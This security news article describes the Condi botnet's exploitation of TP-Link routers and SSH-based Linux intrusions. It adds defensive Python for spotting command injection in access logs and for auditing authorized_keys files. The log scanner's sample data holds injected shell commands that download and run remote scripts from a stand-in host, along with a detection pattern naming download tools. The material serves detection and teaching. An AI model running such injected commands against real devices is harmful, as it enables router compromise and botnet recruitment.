A newly identified malware strain, known as Condi, is leveraging a vulnerability found in TP-Link Archer AX21 (AX1800) Wi-Fi routers to integrate these devices into a distributed denial-of-service (DDoS) botnet. This campaign, according to Fortinet’s FortiGuard Labs, has intensified since late May 2023, marking a significant escalation in cyber threats targeted at consumer-grade networking equipment.
The threat actor behind this campaign operates under the alias zxcr9999 on Telegram and runs a channel called Condi Network, where they market their malicious services. Launched in May 2022, this channel has enabled the actor to monetize the botnet by offering DDoS-as-a-service and selling the source code of the malware.
Research by FortiGuard Labs analysts Joie Salvio and Roy Tay indicates that Condi kills competing botnet processes on the same host, but it has no persistence mechanism and does not survive a reboot. It partially compensates by deleting the binaries that could be used to restart or power down the device, such as ‘reboot,’ ‘shutdown,’ and ‘poweroff,’ so that only a physical power cycle clears it.
Unlike much IoT malware, which spreads by brute-forcing Telnet or SSH credentials, Condi carries a scanner module built to find vulnerable TP-Link Archer AX21 routers. When it finds one, it injects a command that downloads a shell script from a remote server and runs it, installing the bot with no user interaction. The flaw it targets is CVE-2023-1389, an unauthenticated command injection in the router’s web management interface with a CVSS score of 8.8, which TP-Link has fixed in updated firmware and which Mirai variants had already exploited earlier in 2023.
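Because the scanner delivers its payload through an injected command in a web request, the router’s (or an upstream proxy’s) access log is the place to look for it. The following Python is an added example written for this article, not Fortinet’s code or a TP-Link artifact: it runs a command-injection heuristic over constructed Common Log Format lines, flagging query-parameter values that contain shell metacharacters or a download tool name. The paths, parameter names, and IP addresses are made up; they are not the vulnerable TP-Link endpoint.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (Common Log Format). Paths, parameter names and
# IPs are invented for this example; they are NOT the vulnerable TP-Link endpoint
# or real Fortinet telemetry. Lines 1 and 4 carry injected shell that fetches and
# runs a remote script, the pattern Condi's scanner uses; lines 2 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [29/May/2023:10:12:01 +0000] "GET /cgi-bin/admin?lang=$(wget+http://198.51.100.9/t.sh+-O-+|+sh) HTTP/1.1" 200 0
192.0.2.44 - - [29/May/2023:10:13:22 +0000] "GET /cgi-bin/admin?lang=en_US HTTP/1.1" 200 512
203.0.113.7 - - [29/May/2023:10:14:05 +0000] "POST /cgi-bin/login HTTP/1.1" 403 0
198.51.100.21 - - [29/May/2023:10:15:40 +0000] "GET /status?id=1%3Bcurl%20http%3A%2F%2F198.51.100.9%2Fbot%20-o%20%2Ftmp%2Fb HTTP/1.1" 404 0
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
SHELL_META = re.compile(r'[;|`]|\$\(|\$\{')              # command separators / substitution
DOWNLOADERS = re.compile(r'\b(wget|curl|tftp|ftpget)\b')  # stagers used to pull the next stage


def query_params(target):
    """Split the query string on '&' and percent/plus-decode each value twice,
    so that single- and double-encoded payloads both surface."""
    _, _, query = target.partition('?')
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        yield unquote_plus(name), unquote_plus(unquote_plus(value))


def find_injection_attempts(log_text):
    """Return one finding per request whose query parameters look like a
    command-injection payload. The HTTP status is kept because a 2xx on a
    hit means the injected command most likely ran; a 4xx is a probe."""
    findings = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        reasons = []
        for name, value in query_params(m['target']):
            if SHELL_META.search(value):
                reasons.append(f"shell metacharacters in '{name}'")
            if DOWNLOADERS.search(value):
                reasons.append(f"download tool in '{name}'")
        if reasons:
            findings.append({'ip': m['ip'], 'status': int(m['status']),
                             'target': m['target'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in find_injection_attempts(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['status']} {f['target']}: {'; '.join(f['reasons'])}")
```

Two design points: values are decoded twice because a scanner that URL-encodes its payload once will be decoded by the web server, so a double-encoded payload can slip past a single-pass filter; and failed requests are reported alongside successful ones, since a scanner sweeping address ranges leaves probes on devices it could not exploit, which still tells you who was looking.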
Fortinet has also encountered other Condi variants that exploit known security flaws, reinforcing the notion that unpatched software remains a prime target for botnet malware. Beyond its aggressive monetization strategies, Condi’s primary objective is to amass a robust DDoS botnet that can be rented out to execute TCP and UDP flood attacks against various online services.
This development aligns with broader trends noted by the AhnLab Security Emergency Response Center (ASEC), which revealed that inadequately managed Linux servers are increasingly being compromised to deploy DDoS bots such as ShellBot and Tsunami, while also hijacking resources for cryptocurrency mining. ASEC emphasized that the source code for Tsunami is publicly available, facilitating its adoption by numerous threat actors for diverse attacks, especially against Internet of Things (IoT) devices.
The attacks ASEC describes typically begin with a dictionary attack against SSH, after which the intruder installs a shell script that downloads the later malware stages. Persistence is established by adding the attacker’s own public key to the victim’s .ssh/authorized_keys file, so access survives a password change.
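A key planted in .ssh/authorized_keys is easy to miss by eye, so the practical check is to compare what is on the host against what configuration management deployed. The Python below is an added example written for this article, not ASEC’s tooling: it parses authorized_keys syntax, including the options field with quoted strings, computes OpenSSH-style SHA256 fingerprints, and reports any key on the host that the baseline did not put there. The two files and their key blobs are constructed for the example; a real blob is the wire-format public key, but the parser and audit logic do not depend on that.

```python
import base64
import binascii
import hashlib

KEY_TYPES = {
    'ssh-rsa', 'ssh-ed25519', 'ssh-dss',
    'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', 'ecdsa-sha2-nistp521',
    'sk-ssh-ed25519@openssh.com', 'sk-ecdsa-sha2-nistp256@openssh.com',
}


def _blob(label):
    """Constructed stand-in for a public-key blob (real files hold wire-format keys)."""
    return base64.b64encode(label).decode()


# Constructed files. BASELINE is what configuration management deployed;
# ON_HOST is what an audit found after the server had been exposed to the Internet.
BASELINE = (
    "# managed by config management\n"
    f"ssh-ed25519 {_blob(b'constructed-admin-key')} admin@bastion\n"
    f'from="10.0.0.0/8",no-pty ssh-ed25519 {_blob(b"constructed-deploy-key")} deploy@ci\n'
)
ON_HOST = BASELINE + f"ssh-rsa {_blob(b'constructed-intruder-key')}\n"


def ssh_fingerprint(blob_b64):
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(key blob)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return 'SHA256:' + base64.b64encode(digest).decode().rstrip('=')


def parse_authorized_keys(text):
    """Parse '[options] keytype base64 [comment]' lines; comments and blanks skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        options = ''
        if line.split(None, 1)[0] not in KEY_TYPES:
            # Options run to the first whitespace outside double quotes, so an
            # option like command="/usr/bin/rsync --server" is not split on its space.
            in_quote, i = False, 0
            while i < len(line):
                ch = line[i]
                if ch == '"' and (i == 0 or line[i - 1] != '\\'):
                    in_quote = not in_quote
                elif ch.isspace() and not in_quote:
                    break
                i += 1
            options, line = line[:i], line[i:].strip()
        parts = line.split(None, 2)
        if len(parts) < 2 or parts[0] not in KEY_TYPES:
            entries.append({'line': lineno, 'error': 'unparseable entry'})
            continue
        try:
            fp = ssh_fingerprint(parts[1])
        except (binascii.Error, ValueError):
            entries.append({'line': lineno, 'error': 'undecodable key blob'})
            continue
        entries.append({'line': lineno, 'type': parts[0], 'fingerprint': fp,
                        'options': options, 'comment': parts[2] if len(parts) == 3 else ''})
    return entries


def audit_authorized_keys(on_host_text, baseline_text):
    """Report keys on the host that the baseline did not deploy, plus anything
    the parser could not make sense of (which is itself worth a look)."""
    approved = {e['fingerprint'] for e in parse_authorized_keys(baseline_text) if 'error' not in e}
    findings = []
    for e in parse_authorized_keys(on_host_text):
        if 'error' in e:
            findings.append((e['line'], e['error']))
        elif e['fingerprint'] not in approved:
            findings.append((e['line'], f"unapproved {e['type']} key {e['fingerprint']} "
                                        f"comment={e['comment']!r} options={e['options']!r}"))
    return findings


if __name__ == '__main__':
    for lineno, msg in audit_authorized_keys(ON_HOST, BASELINE):
        print(f"authorized_keys line {lineno}: {msg}")
```

Matching on fingerprints rather than raw lines is deliberate: an attacker who appends a key with a plausible comment such as an existing admin’s address will still fail the comparison, and a legitimate key whose comment or options were edited will not raise a false alarm. Run the same comparison for root and for every account with a login shell, not just for the user whose home directory was obviously touched.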
Mapped to the MITRE ATT&CK framework, the Condi campaign as described here covers initial access through exploitation of a public-facing application (the router’s web interface), command and control for tasking the bots, and impact in the form of network denial of service; the ASEC-reported server intrusions add password guessing for initial access and SSH authorized_keys manipulation for persistence.
The defensive steps follow from those techniques. For the routers, apply TP-Link’s fixed firmware for CVE-2023-1389 and keep remote management off the WAN interface; strong passwords do not help against an unauthenticated command injection. For Linux servers, disable password authentication on SSH or enforce strong credentials, and audit .ssh/authorized_keys against a known-good baseline so that a planted key is caught even after the password is changed.